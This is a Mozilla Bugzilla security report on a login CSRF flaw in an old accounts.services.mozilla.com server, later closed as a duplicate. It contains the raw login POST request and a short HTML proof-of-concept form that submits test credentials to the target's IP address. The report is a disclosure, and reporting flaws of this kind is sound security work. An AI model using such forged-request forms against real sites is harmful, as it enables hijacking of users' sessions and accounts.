Closed
Bug 1116791
Opened 9 years ago
Closed 9 years ago
CSRF vulnerability in accounts.services.mozilla.com
Categories
(mozilla.org Graveyard :: Server Operations, task)
Tracking
(Not tracked)
RESOLVED
DUPLICATE
of bug 772818
People
(Reporter: lalithr95, Unassigned)
Details
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0 Build ID: 20140410211200 Steps to reproduce: CSRF vulnerability in mozilla URL : https://63.245.217.128/ The Login request doesnot have valid protection against CSRF attacks . Here is the request POST / HTTP/1.1 Host: 63.245.217.128 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://63.245.217.128/ Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 52 username=abhijeth0423%40gmail.com&password=testadmin CSRF POC : <html> <body> <form action="https://63.245.217.128/" method="POST"> <input type="hidden" name="username" value="abhijeth0423@gmail.com" /> <input type="hidden" name="password" value="testadmin" /> <input type="submit" value="Submit request" /> </form> </body> </html> Actual results: Using above vulnerability an attacker can make victim to login into some test account and the observing the changes or actions made by the victim . This is prevented by using either an authenticated token or CSRF token . Expected results: The Login form need to be protected with an authentication token as one of the paramters in the Login form . This will prevent CSRF vulnerability .
Updated•9 years ago
|
Assignee: nobody → server-ops
Component: General → Server Operations
Product: Core → mozilla.org
QA Contact: shyam
Version: 28 Branch → other
Reporter | ||
Comment 1•9 years ago
|
||
Please add sec-bounty flag ! Regards
Comment 2•9 years ago
|
||
As best I can tell this is the old sync service, and signing in with a test account on the web won't do anything in terms of actually syncing anything behaviour-wise. I also see an SSL cert warning if I use the instructions as written, because the IP address doesn't match the cert. Going to https://services.mozilla.com/ doesn't show the same page as ignoring the cert warning. In other words, I'm not sure there's anything to be worried about here. Richard, can you clarify some more?
Flags: needinfo?(rnewman)
Comment 3•9 years ago
|
||
Yeah, that machine is account01.phx.services.mozilla.com, which will be decommissioned soon. And this is a dupe.
Status: UNCONFIRMED → RESOLVED
Closed: 9 years ago
Flags: needinfo?(rnewman)
Resolution: --- → DUPLICATE
Summary: CSRF vulnerability in mozilla subd-domain → CSRF vulnerability in accounts.services.mozilla.com
Updated•9 years ago
|
Product: mozilla.org → mozilla.org Graveyard
Updated•9 years ago
|
Group: core-security
You need to log in
before you can comment on or make changes to this bug.
Description
•